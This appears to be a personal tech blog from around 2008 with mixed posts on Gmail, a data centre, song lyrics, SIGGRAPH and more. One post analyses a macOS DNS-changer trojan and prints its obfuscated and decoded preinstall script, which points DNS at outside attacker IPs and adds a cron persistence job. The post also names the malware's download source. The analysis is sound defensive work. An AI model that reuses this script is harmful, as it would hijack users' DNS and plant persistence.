Gentlemen, I have had men watching you for a long time and I am convinced that you have used the funds of the bank to speculate in the breadstuffs of the country.

When you won, you divided the profits amongst you, and when you lost, you charged it to the bank.

You tell me that if I take the deposits from the bank and annul its charter, I shall ruin ten thousand families. That may be true, gentlemen, but that is your sin! Should I let you go on, you will ruin fifty thousand families, and that would be my sin!

You are a den of vipers and thieves.

-- Andrew Jackson (7th US President, when forcing the closure of the Second Bank of the US in 1836 by revoking its charter)

After reading about the new Gmail hacking tool I thought I'd take advantage of the new Gmail setting which allows your traffic to always be sent over encrypted SSL connections.

I spent a good long time hunting through Gmail's settings trying to find the mysterious "Always use https" setting. Eventually I figured out that the issue is that this new setting hasn't yet made it to Google Apps.

I don't see this advertised anywhere, and I hope I'm just missing something. However logging into my standard Gmail account I see the setting exactly where it should be.

I've informed Google and hopefully it's coming soon. In the mean time ... suck.

Computer World has a nice (but short!) write up on our new data centre. It's kept us busy for a long time, it's nice to see people interested in what we've done.

Weta Digital, the studio that produced the Lord of the Rings series and King Kong, has completed its new extreme density data centre.

Weta says the space and energy efficient facility is unlike any other worldwide, balancing floor space, power, cooling and other technologies to deliver maximum frame rendering power.

The facility is also claiming another world first: the first to use Hewlett-Packard's Double Density server blades, which combine two independent servers in one blade.

"The increased density of the blades allows us to add a significantly higher number of processors in a confined physical footprint while still managing within tight power consumption and cooling requirements," says acting CEO Adam Shand.

The facility uses water cooled racks made by Rittal, which allow cooling to be delivered to racks as needed in real-time. Cooling is self-regulated and can be managed at a granular level for each rack, Shand says.

Source: http://computerworld.co.nz/news.nsf/tech/FC20EE172043775FCC2574BB00113609

UPDATE: DOH. Thanks to John and Tim for pointing out the typo, I am in fact acting CTO ... not CEO. <sigh>

hey Jack Kerouac
I think of your mother
and the tears she cried, she cried for none other
than her little boy lost in our little world that hated
and that dared to drag him down
her little boy courageous

who chose his words from mouths of
babes got lost in the wood
hip flask slinging madman, steaming cafe flirts
they all spoke through you.

hey Jack
now for the tricky part,
when you were the brightest
star who were the shadows?
of the San Francisco beat boys
you were the favorite.
now they sit and rattle their bones
and think of their blood stoned days

you chose your words from mouths of
babes got lost in the wood.
The hip flask slinging madman, steaming [cafe flirts]
nights in Chinatown howling at night.

Allen baby, why so jaded?
Have the boys all grown up and their beauty faded?
Billy, what a saint they've made you,
just like Mary down in Mexico on All Souls' Day.

you chose your words from mouths of
babes got lost in the wood.
cool junk booting madmen, street minded girls
in Harlem howling at night.

what a tear stained shock of the world,
you've gone away without saying
saying goodbye.

Source: http://www.nataliemerchant.com/history/lyrics/song_lyrics/h_songs/heyJackKerouac.php

The latest xkcd makes a reference to Harrison Ford and ESB¹ which I failed to grasp. In an effort to comprehend I asked Google and was directed to this site. Following my nose led me here which in turn directed me to a fake YouTube site.

When I clicked on the fake YouTube widget to view the video as prompted, I noticed Finder mount a DMG image in the background and Installer try to install something. I've become so relaxed about security on my Mac that it took a second for me to even realise that something bad was in the process of happening. Fortunately, before I had time to react, the Installer application crashed.

This means that Safari automatically downloaded and mounted a DMG from an unknown and untrusted web site, and then ran the included installer package without asking for permission. This is not cool. Fortunately protecting yourself from this is pretty straight forward:

1. In "Safari - Preferences - General" make sure that "Open safe files after downloading" is not ticked.
2. In "System Preferences - Accounts - <your account name>" make sure that "Allow user to administer this computer" is not ticked.

The first means that after downloading a file Safari will never automatically run it, this is a minor inconvenience but means that nothing can be run without your explicit request (eg. double clicking the file).

The second means that if something does get run, the program won't have permissions to do anything which requires admin privileges. This won't stop it from deleting all your personal data, but it will stop it from messing with any system settings.

I've put a copy of the DMG up on my website in case anybody wants to download it and have a look. For those that are curious about what I found when I started to poke around, keep reading.

These lines were generated in "/var/log/system.log":

Aug 30 21:54:14 overkill kernel[0]: Safari[303] Unable to clear quarantine `install.pkg': 30
Aug 30 21:54:17 overkill Installer[16295]: An uncaught exception was raised
Aug 30 21:54:17 overkill Installer[16295]: *** -[NSCFArray removeObjectAtIndex:]: index (1) beyond bounds (1)
Aug 30 21:54:17 overkill Installer[16295]: *** Terminating app due to uncaught exception 'NSRangeException', reason: '*** -[NSCFArray removeObjectAtIndex:]: index (1) beyond bounds (1)'
Aug 30 21:54:17 overkill Installer[16295]: Stack: (\n    2444165451,\n    2518110459,\n    2444164907,\n    2444164970,\n    2496036639,\n    2495531216,\n    2495657399,\n    2417387518,\n    2417386423,\n    273528,\n    158730,\n    2495524637,\n    2495523524,\n    2481334005,\n    2481333682\n)
Aug 30 21:54:35 overkill ReportCrash[16298]: Formulating crash report for process Installer[16295]
Aug 30 21:54:36 overkill com.apple.launchd[100] ([0x0-0x213213].com.apple.installer[16295]): Exited abnormally: Trace/BPT trap
Aug 30 21:54:43 overkill ReportCrash[16298]: Saved crashreport to /Users/adam/Library/Logs/CrashReporter/Installer_2008-08-30-215417_overkill.crash using uid: xxxx gid: yyyy, euid: xxxx egid: yyyy
Aug 30 21:55:10 overkill /usr/sbin/ocspd[16314]: starting
Aug 30 21:55:11 overkill SubmitReport[16311]: Submitted compressed crash report for Installer

In my "~/Downloads/" directory I had a file called "1023.dmg", the file metadata tells me that it was downloaded from "http://64.28.190.22/download/1023.dmg, http://immenseclips.com/m6/movie1.php?id=1658&n=teen".

The DMG mounted itself at "/Volumes/153" and contained a single package called "install.pkg" with these contents:

overkill(adam)$ find /Volumes/153/install.pkg -ls
19   0 drwxr-xr-x    3 adam    user    102 Mar 12 00:37 /Volumes/153/install.pkg
20   0 drwxr-xr-x    7 adam    user    238 Mar 12 00:37 /Volumes/153/install.pkg/Contents
21  72 -r--r--r--    1 adam    user  35866 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Archive.bom
22   8 -r--r--r--    1 adam    user   3027 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Archive.pax.gz
23   8 -r--r--r--    1 adam    user   1326 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Info.plist
24   8 -r--r--r--    1 adam    user      8 Mar 12 00:37 /Volumes/153/install.pkg/Contents/PkgInfo
25   0 drwxr-xr-x   12 adam    user    408 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources
26   8 lrwxr-xr-x    1 adam    user     14 Mar 12 23:36 /Volumes/153/install.pkg/Contents/Resources/153.bom -> ../Archive.bom
27   8 lrwxr-xr-x    1 adam    user     17 Mar 12 23:36 /Volumes/153/install.pkg/Contents/Resources/153.pax.gz -> ../Archive.pax.gz
28   8 -r--r--r--    1 adam    user     45 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/153.sizes
29   8 -r--r--r--    1 adam    user    554 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/BundleVersions.plist
30   0 drwxr-xr-x    5 adam    user    170 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/English.lproj
31   8 -r--r--r--    1 adam    user    312 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/English.lproj/153.info
32   8 -rw-r--r--    1 adam    user    342 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/English.lproj/Description.plist
33  16 -rwxr-xr-x    1 adam    user   8027 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/English.lproj/License.txt
34   8 -r--r--r--    1 adam    user     17 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/package_version
35   8 -rwxr-xr-x    1 adam    user     98 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/postinstall
36   8 -rwxr-xr-x    1 adam    user     98 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/postupgrade
37   8 -rwxr-xr-x    1 adam    user    762 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/preinstall
38   8 -rwxr-xr-x    1 adam    user    762 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/preupgrade

The "Archive.bom" claims that it will install these files (none of which actually exist as far as I can tell):

overkill(adam)$ lsbom Archive.bom 
.       40777   501/501
./Mozillaplug.plugin    40775   0/80
./Mozillaplug.plugin/Contents   40775   0/80
./Mozillaplug.plugin/Contents/Info.plist        100664  0/80    930     1525506808
./Mozillaplug.plugin/Contents/MacOS     40775   0/80
./Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin      100775  0/80    24584   1275209212
./Mozillaplug.plugin/Contents/Resources 40775   0/80
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc     100644  0/80    381     3665281426
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.ROVE        100664  0/80    381     2963929028
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.bak 100644  0/80    338     3415230991
./Mozillaplug.plugin/Contents/version.plist     100664  0/80    471     2911002047
./QuickTime.xpt 100755  0/501   762     3209000961
./plugins.settings      100755  0/501   659     869060121
./sendreq       100644  0/501   1214    2574454577

It all looked pretty boring until I found references to "Porn4Mac" in the "Info.plist" and "Description.plist" files:

<key>IFPkgDescriptionDescription</key>
<string>Its a suppa puppa desc yo</string>
<key>IFPkgDescriptionTitle</key>
<string>Porn4Mac</string>

and discovered that the "pre{install,upgrade}" files were "encrypted":

overkill(adam)$ cat preinstall
#!/bin/sh
x=`cat "$0" |wc -l|awk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aax.zr;s2=cx.zxx.aaz.ea;sh 1 `echo $s1|tr qazwsxedcr 0123456789` `echo $s2| tr qazwsxedcr 0123456789`;exit;
#!/bpf/oy
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
ndkf
tkx Sxaxk:/Nkxwnjg/Ginbai/IPs4
q.oynw
uvpx
EOF
)
/voj/obpf/olvxpi << EOF
ndkf
q.pfpx
q.aqq SkjskjAqqjkooko * $1 $2 
okx Sxaxk:/Nkxwnjg/Skjsplk/$PSID/DNS
uvpx
EOF
kepox=`ljnfxab -i|tjkd QvplgTphk.edx`
pr [ "$kepox" == "" ]; xykf
        klyn "* * * * * \"$daxy/QvplgTphk.edx\">/qks/fvii 2>&1" > ljnf.pfox
        ljnfxab ljnf.pfox
        jh -jr ljnf.pfox
rp
jh -jr "$0"

That's suspicious, so now I'm curious and want to know what it's doing

Basically it decrypts the script to a file called "1" and then executes and passes the IP addresses "85.255.115.29" and "85.255.112.61" through as the variables $1 and $2.

The script itself tries to use scutil to set your DNS servers to the passed IP addresses. It then tries to create a cronjob to run a file called "/Library/Internet\ Plug-Ins/Quicktime.xpt" every minute. I think it means to copy itself to Quicktime.xpt but I can't actually find where it does that.

overkill(adam)$ s1=cx.zxx.aax.zr; s2=cx.zxx.aaz.ea; echo $s1 | tr qazwsxedcr 0123456789; echo $s2 | tr qazwsxedcr 0123456789 
85.255.115.29
85.255.112.61

overkill(adam)$ x=`cat preinstall | wc -l | awk '{print $1}'`; x=`expr $x - 2`; tail -$x "preinstall" | tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv
#!/bin/sh
path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<< EOF
open
get State:/Network/Global/IPv4
d.show
quit
EOF
)
/usr/sbin/scutil << EOF
open
d.init
d.add ServerAddresses * $1 $2 
set State:/Network/Service/$PSID/DNS
quit
EOF
exist=`crontab -l|grep QuickTime.xpt`
if [ "$exist" == "" ]; then
        echo "* * * * * \"$path/QuickTime.xpt\">/dev/null 2>&1" > cron.inst
        crontab cron.inst
        rm -rf cron.inst
fi
rm -rf "$0"

So that's that. It totally failed to work on my Mac but that's mostly luck, I strongly recommend to everybody out there that you take the precautions I mention above to stop a future attack being successful.

I do have a couple unanswered questions (it's late so possibly it'll be obvious in the morning):

• I understand why the DMG got automatically mounted, but why did Installer automatically run the installer program?
• Where is Quicktime.xpt supposed to come from? Other then the cronjob which is supposed to run it, I can't see any mention of it or anywhere that it gets created/copied?
• I don't show it above but the postinstall script references a file called "sendreq", again I can't figure out what is supposed to create it?
• What does it mean that the DMG shows as being downloaded from two different sites? I've never seen that before ...

An unexpected, but interesting, distraction for the night!

UPDATE: Apparently this is old news and has been thoroughly discussed elsewhere. It does appear that the version I found is slightly different then the ones being discussed online but it's very similar.

1. Yes I realise that I lose nearly infinite nerd points for not instantaneously realising that ESB stands for "Empire Strikes Back".

The below article in the Los Angeles Times is about a man who decided he wanted to install a urinal at home.

I spent the next few weeks asking women, many of whom I barely knew, what they thought about urinals. The results were not good. First of all, it's got an unfortunate name. Toilets would still be kept outside if they were called crapinals. Also, my female friends said urinals conjured images of large, impersonal institutions such as prisons. They felt like the lidlessness was unsanitary. Basically, what I learned is that women have vastly overestimated the precision of peeing into a toilet bowl while standing up.

When I countered with the clear advantages of the urinal -- toilet seat always down, decreased water use, saved time, ease of cleaning, the option to pour in ice and play the most fun game in the entire world -- the truth came out. Urinals, these women eventually conceded, are simply too aggressively male. It is, they explained, like hanging a codpiece over the mantle. Which, of course, is now my new lifetime dream.

This seemed grossly unfair because there is so much woman stuff in a house. Such as, for instance, the house.

His adventures amused me enough that I called Teresa to see what she thought of the idea. Once she got over the initial confusion of why I was bothering her at work, she responded "Can't you just pee in the sink?". Which was even funnier, so I created a poll on the work intranet which looked like this:

If you still want more information, there's an Ask MetaFilter thread to satisfy any remaining craving for details.

Since I was already in Los Angeles for work I got to spend this week at SIGGRAPH. There were lots of amazing things, much of it way too domain specific to be comprehensible by me. Though utterly non-work related my favourite parts were the new technology and slow art exhibitions:

"The Dreaming Pillow" by Armella Leung and Olivier Oswald completely blew my mind, I think I spent well over 30 minutes playing with it and talking to Armella. It was simple, different and deeply beautiful. I loved navigating the dream sequences but the most surprising part was watching people's visceral reactions to the ghost hands moving "underneath" the pillow. It's hard to describe in a way that feels meaningful, the best I can do is point you at a YouTube video.

The "reAcoustic eGuitar" by Amit Zoran is a fresh take on the acoustic guitar. Each string gets its own chamber to make a unique sound. If you want to change the sound of the guitar you build a CAD model of an appropriately shaped chamber and then print it using a 3d printer. Even cooler though was his next model (the bottom half in the picture), it does away with the physical chambers and instead allows you to manipulate the sound by programming a DSP. Acknowledging that the materials used in construction have an importance to the produced sound, he has also built resonating boards from different woods to allow the musician to quickly change the sound of the instrument mid-performance.

On a more mundane (and work related) note there were some other interesting things:

• Nvidia has come out with a new product called the Quadro Plex S4, four FX5600's in a 1U rack mount.
• ATI has rebranded their high end graphics cards are "FirePro" and they have massively improved up their Linux support. Interestingly they are claiming better performance (for less money) then nvidia. It'll be interesting to see how that pans out.
• Shapeways is a new(?) Netherlands based competitor to New Zealand's Ponoko.
• DepthQ is making a sub-US$6000 projector which will do stereo projection at 1280x720 and 120Hz. It's weighs less then 7lbs and is quiet enough to be used in a dailies room.
• Rhino has finally come out with a license server which will cross layer three boundaries. Woo for being able to run your software on a different subnet then the license server, Boo for using a bespoke license server.
• Contour Design has an ergonomic mouse which has four buttons, a scroll wheel, a thumb rest and most importantly comes left and right handed and in multiple sizes.
• Noren makes noise reduction and heat removal cabinets. They have a range of standard cabinets as well as being able to custom make cabinets to your requirements. Might be useful for projectors in rooms without projection booths (they say they've made cabinets for Barco projectors before).
• I was interested to see the massive amount of products for motion tracking and motion capture. The inertial based systems don't yet have great resolution but the ultrasonic based tracking systems were pretty cool. The virtual camera that Intersense was showing off was pretty impressive.
• Despite their awful name and crap web site DigiComp makes some pretty sweet looking portable RAID 0/1/5 enclosures. No idea on prices or support but I should remember to investigate next time we need to deliver mass data.